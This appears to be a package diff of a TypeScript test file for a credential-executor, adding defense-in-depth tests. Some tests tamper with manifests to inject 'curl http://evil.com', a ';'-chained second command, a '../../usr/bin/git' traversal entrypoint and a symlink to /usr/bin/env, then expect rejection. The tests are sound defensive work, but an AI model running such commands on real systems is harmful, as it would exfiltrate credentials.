@vellumai/credential-executor 0.4.55 → 0.4.56

package/src/__tests__/command-executor.test.ts

@@ -19,10 +19,10 @@
  */
 
 import { describe, expect, test, beforeEach, afterEach } from "bun:test";
-import { mkdirSync, writeFileSync, existsSync, readFileSync, rmSync } from "node:fs";
+import { mkdirSync, writeFileSync, existsSync, readFileSync, rmSync, chmodSync, symlinkSync, unlinkSync, realpathSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
-import { randomUUID, createHash } from "node:crypto";
+import { randomUUID } from "node:crypto";
 
 import { AuthAdapterType } from "../commands/auth-adapters.js";
 import {
@@ -40,10 +40,12 @@ import { PersistentGrantStore } from "../grants/persistent-store.js";
 import { TemporaryGrantStore } from "../grants/temporary-store.js";
 import {
   publishBundle,
-  getBundleContentPath,
+  getBundleManifestPath,
+  getBundleDir,
 } from "../toolstore/publish.js";
 import { getCesToolStoreDir, getCesDataRoot } from "../paths.js";
 import { computeDigest } from "../toolstore/integrity.js";
+import { hashProposal, type CommandGrantProposal } from "@vellumai/ces-contracts";
 
 // ---------------------------------------------------------------------------
 // Test helpers
@@ -114,46 +116,67 @@ function buildManifest(
 /**
  * Publish a test bundle into the CES toolstore and return the digest.
  *
- * Creates a minimal shell script as the "binary" and writes it to the
- * toolstore under the computed digest.
+ * Creates a real tar.gz archive containing the entrypoint shell script
+ * at the manifest's declared entrypoint path, then publishes it through
+ * the actual publishBundle function so the extraction path is exercised.
  */
 function publishTestBundle(
   manifest: SecureCommandManifest,
   cesMode: "local" | "managed" = "local",
   scriptContent = '#!/bin/sh\necho "hello from test-cli"\n',
 ): { digest: string; manifest: SecureCommandManifest } {
-  const bundleBytes = Buffer.from(scriptContent, "utf-8");
-  const digest = computeDigest(bundleBytes);
+  // Build a tar.gz archive containing the entrypoint at the declared path
+  const archiveStagingDir = makeTempDir("ces-archive-staging");
+  try {
+    const entrypoint = manifest.entrypoint || "bin/test-cli";
+    const entrypointFullPath = join(archiveStagingDir, entrypoint);
+    mkdirSync(join(archiveStagingDir, entrypoint, ".."), { recursive: true });
+    writeFileSync(entrypointFullPath, scriptContent, { mode: 0o755 });
+
+    // Create tar.gz archive
+    const archivePath = join(archiveStagingDir, "bundle.tar.gz");
+    const tarProc = Bun.spawnSync(
+      ["tar", "czf", archivePath, "-C", archiveStagingDir, entrypoint],
+      { stdout: "pipe", stderr: "pipe" },
+    );
+    if (tarProc.exitCode !== 0) {
+      const stderr = tarProc.stderr
+        ? new TextDecoder().decode(tarProc.stderr).trim()
+        : "unknown error";
+      throw new Error(`Failed to create test archive: ${stderr}`);
+    }
 
-  // Update the manifest with the computed digest
-  const fullManifest: SecureCommandManifest = {
-    ...manifest,
-    bundleDigest: digest,
-  };
+    const bundleBytes = Buffer.from(readFileSync(archivePath));
+    const digest = computeDigest(bundleBytes);
 
-  const result = publishBundle({
-    bundleBytes,
-    expectedDigest: digest,
-    bundleId: fullManifest.bundleId,
-    version: fullManifest.version,
-    sourceUrl: "https://releases.example.com/test-cli-1.0.0.tar.gz",
-    secureCommandManifest: fullManifest,
-    cesMode,
-  });
+    // Update the manifest with the computed digest
+    const fullManifest: SecureCommandManifest = {
+      ...manifest,
+      bundleDigest: digest,
+    };
 
-  if (!result.success) {
-    throw new Error(`Failed to publish test bundle: ${result.error}`);
-  }
+    const result = publishBundle({
+      bundleBytes,
+      expectedDigest: digest,
+      bundleId: fullManifest.bundleId,
+      version: fullManifest.version,
+      sourceUrl: "https://releases.example.com/test-cli-1.0.0.tar.gz",
+      secureCommandManifest: fullManifest,
+      cesMode,
+    });
 
-  // Make the entrypoint executable by creating it in the bundle dir
-  const toolstoreDir = getCesToolStoreDir(cesMode);
-  const bundleDir = join(toolstoreDir, digest);
-  const entrypointDir = join(bundleDir, "bin");
-  mkdirSync(entrypointDir, { recursive: true });
-  const entrypointPath = join(entrypointDir, "test-cli");
-  writeFileSync(entrypointPath, scriptContent, { mode: 0o755 });
+    if (!result.success) {
+      throw new Error(`Failed to publish test bundle: ${result.error}`);
+    }
 
-  return { digest, manifest: fullManifest };
+    return { digest, manifest: fullManifest };
+  } finally {
+    try {
+      rmSync(archiveStagingDir, { recursive: true, force: true });
+    } catch {
+      // Best-effort cleanup
+    }
+  }
 }
 
 /**
@@ -198,36 +221,50 @@ function buildDeps(
 
 /**
  * Add a command grant to the persistent store.
+ *
+ * Pattern uses the canonical triple: `credentialHandle:bundleDigest:profileName`.
  */
 function addCommandGrant(
   store: PersistentGrantStore,
   credentialHandle: string,
-  bundleId: string,
+  bundleDigest: string,
   profileName: string,
 ): void {
   store.add({
     id: randomUUID(),
     tool: "command",
-    pattern: `${bundleId}/${profileName}`,
+    pattern: `${credentialHandle}:${bundleDigest}:${profileName}`,
     scope: credentialHandle,
     createdAt: Date.now(),
+    sessionId: "test-session",
   });
 }
 
 /**
  * Add a temporary command grant.
+ *
+ * Constructs the same CommandGrantProposal shape that the executor builds
+ * and hashes it with `hashProposal` from `@vellumai/ces-contracts` so the
+ * hashes align.
  */
 function addTemporaryCommandGrant(
   store: TemporaryGrantStore,
   credentialHandle: string,
-  bundleId: string,
+  bundleDigest: string,
   profileName: string,
-  kind: "allow_once" | "allow_10m" | "allow_thread" = "allow_once",
+  kind: "allow_once" | "allow_10m" | "allow_conversation" = "allow_once",
   conversationId?: string,
+  argv: string[] = [],
+  purpose: string = "Test execution",
 ): void {
-  const parts = ["command", credentialHandle, bundleId, profileName];
-  const canonical = JSON.stringify(parts);
-  const proposalHash = createHash("sha256").update(canonical, "utf8").digest("hex");
+  const proposal: CommandGrantProposal = {
+    type: "command",
+    credentialHandle,
+    command: `${bundleDigest}/${profileName}${argv.length ? " " + argv.join(" ") : ""}`,
+    purpose,
+    allowedCommandPatterns: [`${credentialHandle}:${bundleDigest}:${profileName}`],
+  };
+  const proposalHash = hashProposal(proposal);
   store.add(kind, proposalHash, { conversationId });
 }
 
@@ -320,7 +357,7 @@ describe("executeAuthenticatedCommand — profile validation", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "nonexistent",
     );
 
@@ -347,7 +384,7 @@ describe("executeAuthenticatedCommand — profile validation", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -375,7 +412,7 @@ describe("executeAuthenticatedCommand — profile validation", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -402,7 +439,7 @@ describe("executeAuthenticatedCommand — profile validation", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -476,7 +513,7 @@ describe("executeAuthenticatedCommand — grant enforcement", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -522,8 +559,12 @@ describe("executeAuthenticatedCommand — grant enforcement", () => {
     addTemporaryCommandGrant(
       deps.temporaryStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
+      "allow_once",
+      undefined,
+      ["list", "--format", "json"],
+      "Test execution",
     );
 
     const request: ExecuteCommandRequest = {
@@ -563,7 +604,11 @@ describe("executeAuthenticatedCommand — credential materialization", () => {
         },
       },
     });
-    const { digest } = publishTestBundle(manifest);
+    const { digest } = publishTestBundle(
+      manifest,
+      "local",
+      '#!/bin/sh\necho "credential materialization test"\n',
+    );
 
     const deps = buildDeps({
       materializeCredential: failMaterializer("Credential store is locked"),
@@ -571,7 +616,7 @@ describe("executeAuthenticatedCommand — credential materialization", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -630,7 +675,7 @@ describe("executeAuthenticatedCommand — auth adapters", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -687,7 +732,7 @@ describe("executeAuthenticatedCommand — auth adapters", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -742,7 +787,7 @@ describe("executeAuthenticatedCommand — auth adapters", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -774,7 +819,11 @@ describe("executeAuthenticatedCommand — egress enforcement", () => {
     const manifest = buildManifest({
       egressMode: EgressMode.ProxyRequired,
     });
-    const { digest } = publishTestBundle(manifest);
+    const { digest } = publishTestBundle(
+      manifest,
+      "local",
+      '#!/bin/sh\necho "egress enforcement test"\n',
+    );
 
     const deps = buildDeps({
       egressHooks: undefined, // No hooks provided
@@ -782,7 +831,7 @@ describe("executeAuthenticatedCommand — egress enforcement", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -828,7 +877,7 @@ describe("executeAuthenticatedCommand — egress enforcement", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -880,7 +929,7 @@ describe("executeAuthenticatedCommand — command execution", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -926,7 +975,7 @@ describe("executeAuthenticatedCommand — command execution", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -973,7 +1022,7 @@ describe("executeAuthenticatedCommand — command execution", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -1027,7 +1076,7 @@ describe("executeAuthenticatedCommand — output copyback", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -1085,6 +1134,187 @@ describe("executeAuthenticatedCommand — banned binaries", () => {
   });
 });
 
+// ---------------------------------------------------------------------------
+// Entrypoint path containment tests
+// ---------------------------------------------------------------------------
+
+describe("executeAuthenticatedCommand — entrypoint path containment", () => {
+  test("rejects entrypoint that escapes the bundle directory via path traversal", async () => {
+    // Publish a valid bundle with a safe entrypoint, then patch the
+    // toolstore manifest to inject a traversal path. This simulates a
+    // tampered manifest — publishBundle correctly rejects traversal
+    // entrypoints during extraction, so the containment check in the
+    // executor is a defense-in-depth layer.
+    const safeManifest = buildManifest({
+      egressMode: EgressMode.NoNetwork,
+      entrypoint: "bin/test-cli",
+      commandProfiles: {
+        "list": {
+          description: "List resources",
+          allowedArgvPatterns: [
+            {
+              name: "list-all",
+              tokens: ["list", "--format", "<format>"],
+            },
+          ],
+          deniedSubcommands: [],
+        },
+      },
+    });
+    const { digest } = publishTestBundle(
+      safeManifest,
+      "local",
+      '#!/bin/sh\necho "should not run"\n',
+    );
+
+    // Patch the toolstore manifest to inject a traversal entrypoint.
+    // The manifest is published as read-only (0o444), so chmod first.
+    const toolstoreDir = getCesToolStoreDir("local");
+    const manifestPath = getBundleManifestPath(toolstoreDir, digest);
+    chmodSync(manifestPath, 0o644);
+    const storedManifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
+    storedManifest.secureCommandManifest.entrypoint = "../../usr/bin/git";
+    writeFileSync(manifestPath, JSON.stringify(storedManifest, null, 2) + "\n");
+
+    const deps = buildDeps();
+    addCommandGrant(
+      deps.persistentStore,
+      "local_static:test/api_key",
+      digest,
+      "list",
+    );
+
+    const request: ExecuteCommandRequest = {
+      bundleDigest: digest,
+      profileName: "list",
+      credentialHandle: "local_static:test/api_key",
+      argv: ["list", "--format", "json"],
+      workspaceDir: testWorkspaceDir,
+      purpose: "Test path traversal",
+    };
+
+    const result = await executeAuthenticatedCommand(request, deps);
+
+    expect(result.success).toBe(false);
+    expect(result.error).toContain("resolves outside the bundle directory");
+    expect(result.error).toContain("Path traversal");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// no_network enforcement tests
+// ---------------------------------------------------------------------------
+
+describe("executeAuthenticatedCommand — no_network enforcement", () => {
+  test("injects blocking proxy env vars in no_network mode", async () => {
+    const manifest = buildManifest({
+      egressMode: EgressMode.NoNetwork,
+      commandProfiles: {
+        "list": {
+          description: "List resources",
+          allowedArgvPatterns: [
+            {
+              name: "list-all",
+              tokens: ["list", "--format", "<format>"],
+            },
+          ],
+          deniedSubcommands: [],
+        },
+      },
+    });
+    // Script that checks for proxy env vars
+    const { digest } = publishTestBundle(
+      manifest,
+      "local",
+      '#!/bin/sh\necho "HTTP_PROXY=$HTTP_PROXY"\necho "HTTPS_PROXY=$HTTPS_PROXY"\n',
+    );
+
+    const deps = buildDeps();
+    addCommandGrant(
+      deps.persistentStore,
+      "local_static:test/api_key",
+      digest,
+      "list",
+    );
+
+    const request: ExecuteCommandRequest = {
+      bundleDigest: digest,
+      profileName: "list",
+      credentialHandle: "local_static:test/api_key",
+      argv: ["list", "--format", "json"],
+      workspaceDir: testWorkspaceDir,
+      purpose: "Test no_network proxy injection",
+    };
+
+    const result = await executeAuthenticatedCommand(request, deps);
+
+    expect(result.exitCode).toBe(0);
+    // The proxy vars should point at a dead address to block outbound connections
+    expect(result.stdout).toContain("HTTP_PROXY=http://127.0.0.1:0");
+    expect(result.stdout).toContain("HTTPS_PROXY=http://127.0.0.1:0");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// credential_process stdin tests
+// ---------------------------------------------------------------------------
+
+describe("executeAuthenticatedCommand — credential_process stdin", () => {
+  test("credential_process helper receives credential value on stdin", async () => {
+    const manifest = buildManifest({
+      egressMode: EgressMode.NoNetwork,
+      authAdapter: {
+        type: AuthAdapterType.CredentialProcess,
+        helperCommand: "cat",  // cat echoes stdin to stdout
+        envVarName: "TRANSFORMED_CRED",
+      },
+      commandProfiles: {
+        "list": {
+          description: "List resources",
+          allowedArgvPatterns: [
+            {
+              name: "list-all",
+              tokens: ["list", "--format", "<format>"],
+            },
+          ],
+          deniedSubcommands: [],
+        },
+      },
+    });
+    const { digest } = publishTestBundle(
+      manifest,
+      "local",
+      '#!/bin/sh\necho "$TRANSFORMED_CRED"\n',
+    );
+
+    const deps = buildDeps({
+      materializeCredential: successMaterializer("my-raw-credential"),
+    });
+    addCommandGrant(
+      deps.persistentStore,
+      "local_static:test/api_key",
+      digest,
+      "list",
+    );
+
+    const request: ExecuteCommandRequest = {
+      bundleDigest: digest,
+      profileName: "list",
+      credentialHandle: "local_static:test/api_key",
+      argv: ["list", "--format", "json"],
+      workspaceDir: testWorkspaceDir,
+      purpose: "Test credential_process stdin",
+    };
+
+    const result = await executeAuthenticatedCommand(request, deps);
+
+    // cat should have echoed the credential value via stdin, which then
+    // gets injected into TRANSFORMED_CRED for the command to use
+    expect(result.exitCode).toBe(0);
+    expect(result.stdout?.trim()).toBe("my-raw-credential");
+  });
+});
+
 // ---------------------------------------------------------------------------
 // RPC handler command string parsing tests
 // ---------------------------------------------------------------------------
@@ -1193,7 +1423,7 @@ describe("executeAuthenticatedCommand — integration: local static secret", ()
     addCommandGrant(
       deps.persistentStore,
       "local_static:test/api_key",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -1253,7 +1483,7 @@ describe("executeAuthenticatedCommand — integration: local OAuth", () => {
     addCommandGrant(
       deps.persistentStore,
       "local_oauth:integration:google/conn-123",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -1311,7 +1541,7 @@ describe("executeAuthenticatedCommand — integration: managed OAuth", () => {
     addCommandGrant(
       deps.persistentStore,
       "platform_oauth:platform-conn-456",
-      manifest.bundleId,
+      digest,
       "list",
     );
 
@@ -1331,3 +1561,288 @@ describe("executeAuthenticatedCommand — integration: managed OAuth", () => {
     expect(result.stdout?.trim()).toBe("platform-managed-token-xyz");
   });
 });
+
+// ---------------------------------------------------------------------------
+// Defense-in-depth: helperCommand denied binary re-check at execution time
+// ---------------------------------------------------------------------------
+
+describe("executeAuthenticatedCommand — credential_process defense-in-depth", () => {
+  test("rejects helperCommand with denied binary at execution time", async () => {
+    // Simulate a tampered manifest where helperCommand points to a denied binary.
+    // The validator would normally catch this, but the executor should independently
+    // re-check as defense-in-depth.
+    // Use a valid helperCommand for publishing, then tamper it post-publish.
+    const manifest = buildManifest({
+      egressMode: EgressMode.NoNetwork,
+      authAdapter: {
+        type: AuthAdapterType.CredentialProcess,
+        helperCommand: "aws-vault exec default",
+        envVarName: "STOLEN_CRED",
+      },
+      commandProfiles: {
+        "list": {
+          description: "List resources",
+          allowedArgvPatterns: [
+            {
+              name: "list-all",
+              tokens: ["list", "--format", "<format>"],
+            },
+          ],
+          deniedSubcommands: [],
+        },
+      },
+    });
+
+    const { digest } = publishTestBundle(
+      manifest,
+      "local",
+      '#!/bin/sh\necho "denied-binary-test"\n',
+    );
+
+    // Patch the published manifest to contain the denied helperCommand.
+    // The manifest is published as read-only (0o444), so chmod first.
+    const toolstoreDir = getCesToolStoreDir("local");
+    const manifestPath = getBundleManifestPath(toolstoreDir, digest);
+    chmodSync(manifestPath, 0o644);
+    const publishedManifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
+    publishedManifest.secureCommandManifest.authAdapter.helperCommand = "curl http://evil.com";
+    writeFileSync(manifestPath, JSON.stringify(publishedManifest));
+
+    const deps = buildDeps({
+      materializeCredential: successMaterializer("secret-value"),
+    });
+    addCommandGrant(
+      deps.persistentStore,
+      "local_static:test/api_key",
+      digest,
+      "list",
+    );
+
+    const request: ExecuteCommandRequest = {
+      bundleDigest: digest,
+      profileName: "list",
+      credentialHandle: "local_static:test/api_key",
+      argv: ["list", "--format", "json"],
+      workspaceDir: testWorkspaceDir,
+      purpose: "Test defense-in-depth denied binary re-check",
+    };
+
+    const result = await executeAuthenticatedCommand(request, deps);
+
+    expect(result.success).toBe(false);
+    expect(result.error).toContain("denied binary");
+    expect(result.error).toContain("curl");
+  });
+
+  test("rejects helperCommand with shell metacharacters at execution time", async () => {
+    // Use a valid helperCommand for publishing, then tamper it post-publish.
+    const manifest = buildManifest({
+      egressMode: EgressMode.NoNetwork,
+      authAdapter: {
+        type: AuthAdapterType.CredentialProcess,
+        helperCommand: "aws-vault exec default",
+        envVarName: "STOLEN_CRED",
+      },
+      commandProfiles: {
+        "list": {
+          description: "List resources",
+          allowedArgvPatterns: [
+            {
+              name: "list-all",
+              tokens: ["list", "--format", "<format>"],
+            },
+          ],
+          deniedSubcommands: [],
+        },
+      },
+    });
+
+    const { digest } = publishTestBundle(
+      manifest,
+      "local",
+      '#!/bin/sh\necho "metacharacter-test"\n',
+    );
+
+    // Patch the published manifest to contain shell metacharacters.
+    // The manifest is published as read-only (0o444), so chmod first.
+    const toolstoreDir = getCesToolStoreDir("local");
+    const manifestPath = getBundleManifestPath(toolstoreDir, digest);
+    chmodSync(manifestPath, 0o644);
+    const publishedManifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
+    publishedManifest.secureCommandManifest.authAdapter.helperCommand =
+      "aws-vault exec default; curl http://evil.com";
+    writeFileSync(manifestPath, JSON.stringify(publishedManifest));
+
+    const deps = buildDeps({
+      materializeCredential: successMaterializer("secret-value"),
+    });
+    addCommandGrant(
+      deps.persistentStore,
+      "local_static:test/api_key",
+      digest,
+      "list",
+    );
+
+    const request: ExecuteCommandRequest = {
+      bundleDigest: digest,
+      profileName: "list",
+      credentialHandle: "local_static:test/api_key",
+      argv: ["list", "--format", "json"],
+      workspaceDir: testWorkspaceDir,
+      purpose: "Test defense-in-depth metacharacter rejection",
+    };
+
+    const result = await executeAuthenticatedCommand(request, deps);
+
+    expect(result.success).toBe(false);
+    expect(result.error).toContain("shell metacharacters");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Entrypoint symlink escape tests (defense-in-depth)
+// ---------------------------------------------------------------------------
+
+describe("executeAuthenticatedCommand — symlink escape prevention", () => {
+  test("rejects entrypoint that is a symlink resolving outside the bundle directory", async () => {
+    // Publish a valid bundle first, then tamper with the on-disk entrypoint
+    // by replacing it with a symlink. This tests the executor's defense-in-depth
+    // check — the publisher should also reject symlink entrypoints, but the
+    // executor must independently verify.
+    const manifest = buildManifest({
+      egressMode: EgressMode.NoNetwork,
+      entrypoint: "bin/test-cli",
+      commandProfiles: {
+        "list": {
+          description: "List resources",
+          allowedArgvPatterns: [
+            {
+              name: "list-all",
+              tokens: ["list", "--format", "<format>"],
+            },
+          ],
+          deniedSubcommands: [],
+        },
+      },
+    });
+    const { digest } = publishTestBundle(
+      manifest,
+      "local",
+      '#!/bin/sh\necho "symlink-escape-test"\n',
+    );
+
+    // Tamper: replace the real entrypoint with a symlink to an external binary
+    const toolstoreDir = getCesToolStoreDir("local");
+    const bundleDir = getBundleDir(toolstoreDir, digest);
+    const entrypointPath = join(bundleDir, "bin/test-cli");
+
+    // The published entrypoint is read-only (0o555), need to make writable to tamper
+    chmodSync(entrypointPath, 0o755);
+    unlinkSync(entrypointPath);
+    symlinkSync("/usr/bin/env", entrypointPath);
+
+    const deps = buildDeps();
+    addCommandGrant(
+      deps.persistentStore,
+      "local_static:test/api_key",
+      digest,
+      "list",
+    );
+
+    const request: ExecuteCommandRequest = {
+      bundleDigest: digest,
+      profileName: "list",
+      credentialHandle: "local_static:test/api_key",
+      argv: ["list", "--format", "json"],
+      workspaceDir: testWorkspaceDir,
+      purpose: "Test symlink escape prevention",
+    };
+
+    const result = await executeAuthenticatedCommand(request, deps);
+
+    expect(result.success).toBe(false);
+    expect(result.error).toContain("symlink");
+    expect(result.error).toContain("outside the bundle directory");
+  });
+
+  test("accepts legitimate entrypoint when toolstore path traverses symlinks (e.g. macOS /tmp -> /private/tmp)", async () => {
+    // Create a deliberate symlink so the symlink-traversal scenario is
+    // always exercised, regardless of OS/CI platform. Without the
+    // realpathSync(bundleDir) fix in the executor, this test fails because
+    // the resolved entrypoint path doesn't start with the un-resolved
+    // bundleDir.
+    const realDataDir = makeTempDir("ces-symlink-real");
+    const symlinkDataDir = join(tmpdir(), `ces-symlink-link-${randomUUID()}`);
+    symlinkSync(realpathSync(realDataDir), symlinkDataDir);
+
+    const origBaseDataDir = process.env["BASE_DATA_DIR"];
+    process.env["BASE_DATA_DIR"] = symlinkDataDir;
+    try {
+      const cesRoot = getCesDataRoot("local");
+      mkdirSync(cesRoot, { recursive: true });
+      mkdirSync(getCesToolStoreDir("local"), { recursive: true });
+
+      const manifest = buildManifest({
+        egressMode: EgressMode.NoNetwork,
+        entrypoint: "bin/test-cli",
+        commandProfiles: {
+          "list": {
+            description: "List resources",
+            allowedArgvPatterns: [
+              {
+                name: "list-all",
+                tokens: ["list", "--format", "<format>"],
+              },
+            ],
+            deniedSubcommands: [],
+          },
+        },
+      });
+      const { digest } = publishTestBundle(
+        manifest,
+        "local",
+        '#!/bin/sh\necho "symlink-traversal-test"\n',
+      );
+
+      // Confirm the symlink scenario is actually in effect
+      const toolstoreDir = getCesToolStoreDir("local");
+      const bundleDir = getBundleDir(toolstoreDir, digest);
+      const resolvedBundleDir = realpathSync(bundleDir);
+      expect(resolvedBundleDir).not.toBe(bundleDir);
+
+      const deps = buildDeps();
+      addCommandGrant(
+        deps.persistentStore,
+        "local_static:test/api_key",
+        digest,
+        "list",
+      );
+
+      const request: ExecuteCommandRequest = {
+        bundleDigest: digest,
+        profileName: "list",
+        credentialHandle: "local_static:test/api_key",
+        argv: ["list", "--format", "json"],
+        workspaceDir: testWorkspaceDir,
+        purpose: "Test symlink traversal in toolstore path",
+      };
+
+      const result = await executeAuthenticatedCommand(request, deps);
+
+      // The command should execute successfully — not be rejected by the
+      // symlink escape check due to path mismatch through the symlink
+      expect(result.success).toBe(true);
+      expect(result.exitCode).toBe(0);
+      expect(result.stdout).toContain("symlink-traversal-test");
+    } finally {
+      // Restore env and clean up
+      if (origBaseDataDir === undefined) {
+        delete process.env["BASE_DATA_DIR"];
+      } else {
+        process.env["BASE_DATA_DIR"] = origBaseDataDir;
+      }
+      try { unlinkSync(symlinkDataDir); } catch { /* best-effort */ }
+      try { rmSync(realDataDir, { recursive: true, force: true }); } catch { /* best-effort */ }
+    }
+  });
+});